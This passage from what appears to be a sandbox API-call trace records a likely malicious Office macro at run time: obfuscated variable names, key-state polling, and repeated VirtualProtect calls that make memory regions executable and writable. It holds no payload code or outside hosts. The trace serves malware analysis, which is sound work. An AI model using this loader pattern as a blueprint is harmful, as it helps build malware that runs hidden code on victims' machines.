0x0 [0115.118] GetAsyncKeyState (vKey=3) returned 0 [0115.367] GetAsyncKeyState (vKey=3) returned 0 [0115.861] GetAsyncKeyState (vKey=3) returned 0 [0116.133] GetAsyncKeyState (vKey=3) returned 0 [0116.481] GetAsyncKeyState (vKey=3) returned 0 [0116.715] GetAsyncKeyState (vKey=3) returned 0 [0117.033] GetAsyncKeyState (vKey=3) returned 0 [0117.254] GetAsyncKeyState (vKey=3) returned 0 [0117.458] GetAsyncKeyState (vKey=3) returned 0 [0117.707] GetAsyncKeyState (vKey=3) returned 0 [0118.192] GetAsyncKeyState (vKey=3) returned 0 [0118.411] GetAsyncKeyState (vKey=3) returned 0 [0118.662] GetAsyncKeyState (vKey=3) returned 0 [0118.931] GetAsyncKeyState (vKey=3) returned 0 [0119.012] SafeArrayDestroyData (psa=0xc844ef0) returned 0x0 [0119.041] SafeArrayDestroyDescriptor (psa=0xc844ef0) returned 0x0 [0119.041] SafeArrayCopy (in: psa=0xc845310, ppsaOut=0x197c84 | out: ppsaOut=0x197c84) returned 0x0 [0119.077] SafeArrayCopy (in: psa=0xc844fb0, ppsaOut=0x197e98 | out: ppsaOut=0x197e98) returned 0x0 [0119.114] SafeArrayCopy (in: psa=0xc845250, ppsaOut=0x197ff4 | out: ppsaOut=0x197ff4) returned 0x0 [0119.198] GetAsyncKeyState (vKey=3) returned 0 [0119.200] CRetailMalloc_Alloc () returned 0xcb18cd8 [0119.201] memcpy (in: _Dst=0xb754f48, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0119.201] memcpy (in: _Dst=0xb755050, _Src=0x1978c4, _Size=0xc | out: _Dst=0xb755050) returned 0xb755050 [0119.201] memcpy (in: _Dst=0xb754f48, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0119.201] memcpy (in: _Dst=0xb754f48, _Src=0x1978a4, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0119.202] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x96\x96", cchCount1=-1, lpString2="\x96\x97\x96", cchCount2=-1) returned 3 [0119.204] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302eb6, cbMultiByte=4, lpWideCharStr=0x1976c4, cchWideChar=5 | out: lpWideCharStr="–—–") returned 4 [0119.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c0b0e, cbMultiByte=4, lpWideCharStr=0x197724, cchWideChar=5 | out: lpWideCharStr="–—–") returned 4 [0119.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c0b0e, cbMultiByte=4, lpWideCharStr=0x197724, cchWideChar=5 | out: lpWideCharStr="–—–") returned 4 [0119.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c0b0e, cbMultiByte=4, lpWideCharStr=0x197724, cchWideChar=5 | out: lpWideCharStr="–—–") returned 4 [0119.205] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x96\x96", cchCount1=-1, lpString2="\x96\x97\x96", cchCount2=-1) returned 3 [0119.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c0b0e, cbMultiByte=4, lpWideCharStr=0x197724, cchWideChar=5 | out: lpWideCharStr="–—–") returned 4 [0119.205] CRetailMalloc_Alloc () returned 0xcac27f0 [0119.205] _mbscpy_s (in: _Dst=0xcac27f0, _DstSizeInBytes=0x4, _Src=0x112c0b0e | out: _Dst=0xcac27f0) returned 0x0 [0119.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c0ce6, cbMultiByte=11, lpWideCharStr=0x197734, cchWideChar=12 | out: lpWideCharStr="_B_var_–—–") returned 11 [0119.207] _mbscpy_s (in: _Dst=0x19779c, _DstSizeInBytes=0x4, _Src=0x112c0b0e | out: _Dst=0x19779c) returned 0x0 [0119.207] CRetailMalloc_Free () returned 0x1 [0119.208] memcpy (in: _Dst=0xb755050, _Src=0xb755050, _Size=0xc | out: _Dst=0xb755050) returned 0xb755050 [0119.208] memcpy (in: _Dst=0xb754f48, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0119.208] memcpy (in: _Dst=0xb754f4c, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb754f4c) returned 0xb754f4c [0119.208] memcpy (in: _Dst=0xb754f48, _Src=0x197714, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0119.208] memcpy (in: _Dst=0xb754f48, _Src=0x197714, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0119.208] memcpy (in: _Dst=0xb754f48, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0119.208] memcpy (in: _Dst=0xb754f48, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0119.208] memcpy (in: _Dst=0xcb18cfa, _Src=0x197878, _Size=0x1 | out: _Dst=0xcb18cfa) returned 0xcb18cfa [0119.208] memcpy (in: _Dst=0xcb18d50, _Src=0x197944, _Size=0x18 | out: _Dst=0xcb18d50) returned 0xcb18d50 [0119.208] CRetailMalloc_Realloc () returned 0xcb18cd8 [0119.209] CRetailMalloc_Free () returned 0x1 [0119.209] GetCurrentProcess () returned 0xffffffff [0119.209] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912074, dwSize=0x14) returned 1 [0119.209] VirtualProtect (in: lpAddress=0xc912074, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.210] GetCurrentProcess () returned 0xffffffff [0119.210] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912075, dwSize=0x2) returned 1 [0119.210] GetCurrentProcess () returned 0xffffffff [0119.210] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912094, dwSize=0x14) returned 1 [0119.210] VirtualProtect (in: lpAddress=0xc912094, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.211] GetCurrentProcess () returned 0xffffffff [0119.211] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912095, dwSize=0x2) returned 1 [0119.211] GetCurrentProcess () returned 0xffffffff [0119.211] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b4, dwSize=0x14) returned 1 [0119.211] VirtualProtect (in: lpAddress=0xc9120b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.212] GetCurrentProcess () returned 0xffffffff [0119.212] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b5, dwSize=0x2) returned 1 [0119.212] GetCurrentProcess () returned 0xffffffff [0119.212] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d4, dwSize=0x14) returned 1 [0119.212] VirtualProtect (in: lpAddress=0xc9120d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.213] GetCurrentProcess () returned 0xffffffff [0119.213] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d5, dwSize=0x2) returned 1 [0119.213] GetCurrentProcess () returned 0xffffffff [0119.213] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f4, dwSize=0x14) returned 1 [0119.213] VirtualProtect (in: lpAddress=0xc9120f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.213] GetCurrentProcess () returned 0xffffffff [0119.213] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f5, dwSize=0x2) returned 1 [0119.213] GetCurrentProcess () returned 0xffffffff [0119.213] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912114, dwSize=0x14) returned 1 [0119.214] VirtualProtect (in: lpAddress=0xc912114, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.215] GetCurrentProcess () returned 0xffffffff [0119.215] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912115, dwSize=0x2) returned 1 [0119.215] GetCurrentProcess () returned 0xffffffff [0119.215] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912134, dwSize=0x14) returned 1 [0119.215] VirtualProtect (in: lpAddress=0xc912134, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.216] GetCurrentProcess () returned 0xffffffff [0119.216] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912135, dwSize=0x2) returned 1 [0119.216] GetCurrentProcess () returned 0xffffffff [0119.216] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912154, dwSize=0x14) returned 1 [0119.216] VirtualProtect (in: lpAddress=0xc912154, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.217] GetCurrentProcess () returned 0xffffffff [0119.217] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912155, dwSize=0x2) returned 1 [0119.218] GetCurrentProcess () returned 0xffffffff [0119.218] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912174, dwSize=0x14) returned 1 [0119.218] VirtualProtect (in: lpAddress=0xc912174, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.218] GetCurrentProcess () returned 0xffffffff [0119.218] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912175, dwSize=0x2) returned 1 [0119.218] GetCurrentProcess () returned 0xffffffff [0119.218] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912194, dwSize=0x14) returned 1 [0119.218] VirtualProtect (in: lpAddress=0xc912194, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.219] GetCurrentProcess () returned 0xffffffff [0119.219] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912195, dwSize=0x2) returned 1 [0119.219] GetCurrentProcess () returned 0xffffffff [0119.219] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b4, dwSize=0x14) returned 1 [0119.219] VirtualProtect (in: lpAddress=0xc9121b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.220] GetCurrentProcess () returned 0xffffffff [0119.220] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b5, dwSize=0x2) returned 1 [0119.220] GetCurrentProcess () returned 0xffffffff [0119.220] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d4, dwSize=0x14) returned 1 [0119.220] VirtualProtect (in: lpAddress=0xc9121d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.220] GetCurrentProcess () returned 0xffffffff [0119.220] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d5, dwSize=0x2) returned 1 [0119.220] GetCurrentProcess () returned 0xffffffff [0119.220] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc898, dwSize=0x14) returned 1 [0119.220] VirtualProtect (in: lpAddress=0xcadc898, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.221] GetCurrentProcess () returned 0xffffffff [0119.221] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc899, dwSize=0x2) returned 1 [0119.221] GetCurrentProcess () returned 0xffffffff [0119.221] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b8, dwSize=0x14) returned 1 [0119.221] VirtualProtect (in: lpAddress=0xcadc8b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.270] GetCurrentProcess () returned 0xffffffff [0119.270] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b9, dwSize=0x2) returned 1 [0119.270] GetCurrentProcess () returned 0xffffffff [0119.270] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d8, dwSize=0x14) returned 1 [0119.270] VirtualProtect (in: lpAddress=0xcadc8d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.271] GetCurrentProcess () returned 0xffffffff [0119.271] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d9, dwSize=0x2) returned 1 [0119.271] GetCurrentProcess () returned 0xffffffff [0119.271] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f8, dwSize=0x14) returned 1 [0119.271] VirtualProtect (in: lpAddress=0xcadc8f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.272] GetCurrentProcess () returned 0xffffffff [0119.272] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f9, dwSize=0x2) returned 1 [0119.272] GetCurrentProcess () returned 0xffffffff [0119.272] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc918, dwSize=0x14) returned 1 [0119.272] VirtualProtect (in: lpAddress=0xcadc918, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.272] GetCurrentProcess () returned 0xffffffff [0119.272] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc919, dwSize=0x2) returned 1 [0119.272] GetCurrentProcess () returned 0xffffffff [0119.272] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc938, dwSize=0x14) returned 1 [0119.273] VirtualProtect (in: lpAddress=0xcadc938, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.273] GetCurrentProcess () returned 0xffffffff [0119.273] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc939, dwSize=0x2) returned 1 [0119.273] GetCurrentProcess () returned 0xffffffff [0119.273] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc958, dwSize=0x14) returned 1 [0119.273] VirtualProtect (in: lpAddress=0xcadc958, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.274] GetCurrentProcess () returned 0xffffffff [0119.274] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc959, dwSize=0x2) returned 1 [0119.274] GetCurrentProcess () returned 0xffffffff [0119.274] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc978, dwSize=0x14) returned 1 [0119.274] VirtualProtect (in: lpAddress=0xcadc978, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.275] GetCurrentProcess () returned 0xffffffff [0119.275] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc979, dwSize=0x2) returned 1 [0119.275] GetCurrentProcess () returned 0xffffffff [0119.275] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc998, dwSize=0x14) returned 1 [0119.275] VirtualProtect (in: lpAddress=0xcadc998, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.275] GetCurrentProcess () returned 0xffffffff [0119.275] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc999, dwSize=0x2) returned 1 [0119.275] GetCurrentProcess () returned 0xffffffff [0119.276] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b8, dwSize=0x14) returned 1 [0119.276] VirtualProtect (in: lpAddress=0xcadc9b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.276] GetCurrentProcess () returned 0xffffffff [0119.276] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b9, dwSize=0x2) returned 1 [0119.276] GetCurrentProcess () returned 0xffffffff [0119.276] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d8, dwSize=0x14) returned 1 [0119.276] VirtualProtect (in: lpAddress=0xcadc9d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.277] GetCurrentProcess () returned 0xffffffff [0119.277] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d9, dwSize=0x2) returned 1 [0119.277] GetCurrentProcess () returned 0xffffffff [0119.277] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f8, dwSize=0x14) returned 1 [0119.277] VirtualProtect (in: lpAddress=0xcadc9f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.278] GetCurrentProcess () returned 0xffffffff [0119.278] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f9, dwSize=0x2) returned 1 [0119.278] GetCurrentProcess () returned 0xffffffff [0119.278] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca18, dwSize=0x14) returned 1 [0119.278] VirtualProtect (in: lpAddress=0xcadca18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.278] GetCurrentProcess () returned 0xffffffff [0119.278] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca19, dwSize=0x2) returned 1 [0119.278] GetCurrentProcess () returned 0xffffffff [0119.278] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca38, dwSize=0x14) returned 1 [0119.279] VirtualProtect (in: lpAddress=0xcadca38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.279] GetCurrentProcess () returned 0xffffffff [0119.279] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca39, dwSize=0x2) returned 1 [0119.279] GetCurrentProcess () returned 0xffffffff [0119.279] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca58, dwSize=0x14) returned 1 [0119.279] VirtualProtect (in: lpAddress=0xcadca58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.280] GetCurrentProcess () returned 0xffffffff [0119.280] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca59, dwSize=0x2) returned 1 [0119.280] GetCurrentProcess () returned 0xffffffff [0119.280] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca78, dwSize=0x14) returned 1 [0119.280] VirtualProtect (in: lpAddress=0xcadca78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.281] GetCurrentProcess () returned 0xffffffff [0119.281] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca79, dwSize=0x2) returned 1 [0119.281] GetCurrentProcess () returned 0xffffffff [0119.281] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e0, dwSize=0x14) returned 1 [0119.281] VirtualProtect (in: lpAddress=0xcadb0e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.281] GetCurrentProcess () returned 0xffffffff [0119.281] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e1, dwSize=0x2) returned 1 [0119.281] GetCurrentProcess () returned 0xffffffff [0119.281] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb100, dwSize=0x14) returned 1 [0119.281] VirtualProtect (in: lpAddress=0xcadb100, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.282] GetCurrentProcess () returned 0xffffffff [0119.282] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb101, dwSize=0x2) returned 1 [0119.282] GetCurrentProcess () returned 0xffffffff [0119.282] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb120, dwSize=0x14) returned 1 [0119.282] VirtualProtect (in: lpAddress=0xcadb120, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.283] GetCurrentProcess () returned 0xffffffff [0119.283] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb121, dwSize=0x2) returned 1 [0119.284] GetAsyncKeyState (vKey=3) returned 0 [0119.287] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0119.288] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0119.288] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0119.288] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0119.288] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0119.288] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0119.288] VarAdd (in: pvarLeft=0x198068, pvarRight=0x198018, pvarResult=0x198048 | out: pvarResult=0x198048) returned 0x0 [0119.288] SetErrorMode (uMode=0x8001) returned 0x8001 [0119.288] _stricmp (_Str1="kernel32", _Str2="VBE6.DLL") returned -11 [0119.288] LoadLibraryA (lpLibFileName="kernel32") returned 0x76720000 [0119.289] SetErrorMode (uMode=0x8001) returned 0x8001 [0119.290] GetProcAddress (hModule=0x76720000, lpProcName="VirtualProtect") returned 0x76737a50 [0119.290] VirtualProtect (in: lpAddress=0x9bba020, dwSize=0x15fab2, flNewProtect=0x40, lpflOldProtect=0x197fdc | out: lpflOldProtect=0x197fdc*=0x4) returned 1 [0119.909] GetLastError () returned 0x5 [0119.909] GetAsyncKeyState (vKey=3) returned 0 [0119.920] CRetailMalloc_Alloc () returned 0xcb18da0 [0119.920] memcpy (in: _Dst=0xb754f48, _Src=0x197888, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0119.920] memcpy (in: _Dst=0xb755050, _Src=0x1978a4, _Size=0xc | out: _Dst=0xb755050) returned 0xb755050 [0119.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb317e9e, cbMultiByte=12, lpWideCharStr=0x11460228, cchWideChar=26 | out: lpWideCharStr="fWOdEE5KWqv0") returned 12 [0119.920] CRetailMalloc_Alloc () returned 0xcb31080 [0119.920] memcpy (in: _Dst=0xcb31094, _Src=0x11460224, _Size=0x1e | out: _Dst=0xcb31094) returned 0xcb31094 [0119.920] memcpy (in: _Dst=0xb754f48, _Src=0x1978bc, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0119.920] memcpy (in: _Dst=0xb754f48, _Src=0x197888, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0119.920] memcpy (in: _Dst=0xb754f48, _Src=0x1976f4, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0119.920] memcpy (in: _Dst=0xb754f48, _Src=0x197888, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0119.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb317eba, cbMultiByte=11, lpWideCharStr=0x11460936, cchWideChar=24 | out: lpWideCharStr="mYG4sk7euwt") returned 11 [0119.921] memcpy (in: _Dst=0xcb310b8, _Src=0x11460932, _Size=0x1c | out: _Dst=0xcb310b8) returned 0xcb310b8 [0119.921] memcpy (in: _Dst=0xb754f4c, _Src=0x1978bc, _Size=0x4 | out: _Dst=0xb754f4c) returned 0xb754f4c [0119.921] memcpy (in: _Dst=0xb754f4c, _Src=0x197888, _Size=0x4 | out: _Dst=0xb754f4c) returned 0xb754f4c [0119.921] memcpy (in: _Dst=0xb754f50, _Src=0x197888, _Size=0x4 | out: _Dst=0xb754f50) returned 0xb754f50 [0119.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb317ed4, cbMultiByte=10, lpWideCharStr=0x11460cda, cchWideChar=22 | out: lpWideCharStr="qGghqYYpia") returned 10 [0119.921] memcpy (in: _Dst=0xcb310d8, _Src=0x11460cd6, _Size=0x1a | out: _Dst=0xcb310d8) returned 0xcb310d8 [0119.921] memcpy (in: _Dst=0xb754f54, _Src=0x1978bc, _Size=0x4 | out: _Dst=0xb754f54) returned 0xb754f54 [0119.921] memcpy (in: _Dst=0xb754f54, _Src=0x197888, _Size=0x4 | out: _Dst=0xb754f54) returned 0xb754f54 [0119.922] memcpy (in: _Dst=0x1976cc, _Src=0x197740, _Size=0x8 | out: _Dst=0x1976cc) returned 0x1976cc [0119.922] memcpy (in: _Dst=0xcae18b0, _Src=0x1976cc, _Size=0x8 | out: _Dst=0xcae18b0) returned 0xcae18b0 [0119.922] CRetailMalloc_Alloc () returned 0xcb1f080 [0119.922] CRetailMalloc_Free () returned 0x1 [0119.922] memcpy (in: _Dst=0xb754f48, _Src=0x197888, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0119.922] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x96\x97\x97\x97\x96\x97\x96\x97\x97\x96\x96\x96\x97\x96\x96\x96\x96\x96\x96\x97\x96\x96\x97\x97\x97\x97\x96\x96\x97", cchCount1=-1, lpString2="\x97\x96\x96\x97\x97\x97\x96\x97\x96\x96\x97\x96\x97\x97\x97\x97\x97\x96\x96\x97\x96\x96\x96\x97\x97\x97\x96\x96\x97\x97", cchCount2=-1) returned 3 [0119.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302ed6, cbMultiByte=31, lpWideCharStr=0x1976a4, cchWideChar=32 | out: lpWideCharStr="—––———–—––—–—————––—–––———––——") returned 31 [0119.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111e29f6, cbMultiByte=31, lpWideCharStr=0x197704, cchWideChar=32 | out: lpWideCharStr="—––———–—––—–—————––—–––———––——") returned 31 [0119.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111e29f6, cbMultiByte=31, lpWideCharStr=0x197704, cchWideChar=32 | out: lpWideCharStr="—––———–—––—–—————––—–––———––——") returned 31 [0119.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111e29f6, cbMultiByte=31, lpWideCharStr=0x197704, cchWideChar=32 | out: lpWideCharStr="—––———–—––—–—————––—–––———––——") returned 31 [0119.923] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x96\x97\x97\x97\x96\x97\x96\x97\x97\x96\x96\x96\x97\x96\x96\x96\x96\x96\x96\x97\x96\x96\x97\x97\x97\x97\x96\x96\x97", cchCount1=-1, lpString2="\x97\x96\x96\x97\x97\x97\x96\x97\x96\x96\x97\x96\x97\x97\x97\x97\x97\x96\x96\x97\x96\x96\x96\x97\x97\x97\x96\x96\x97\x97", cchCount2=-1) returned 3 [0119.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111e29f6, cbMultiByte=31, lpWideCharStr=0x197704, cchWideChar=32 | out: lpWideCharStr="—––———–—––—–—————––—–––———––——") returned 31 [0119.924] CRetailMalloc_Alloc () returned 0xc845300 [0119.924] _mbscpy_s (in: _Dst=0xc845300, _DstSizeInBytes=0x1f, _Src=0x111e29f6 | out: _Dst=0xc845300) returned 0x0 [0119.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c0d0e, cbMultiByte=38, lpWideCharStr=0x197714, cchWideChar=39 | out: lpWideCharStr="_B_var_—––———–—––—–—————––—–––———––——") returned 38 [0119.925] _mbscpy_s (in: _Dst=0x19777c, _DstSizeInBytes=0x1f, _Src=0x111e29f6 | out: _Dst=0x19777c) returned 0x0 [0119.925] CRetailMalloc_Free () returned 0x1 [0119.925] memcpy (in: _Dst=0xb755050, _Src=0xb755050, _Size=0xc | out: _Dst=0xb755050) returned 0xb755050 [0119.925] memcpy (in: _Dst=0xb754f48, _Src=0x197888, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0119.925] memcpy (in: _Dst=0xb754f48, _Src=0x1976f4, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0119.925] memcpy (in: _Dst=0xb754f48, _Src=0x1976f4, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0119.925] memcpy (in: 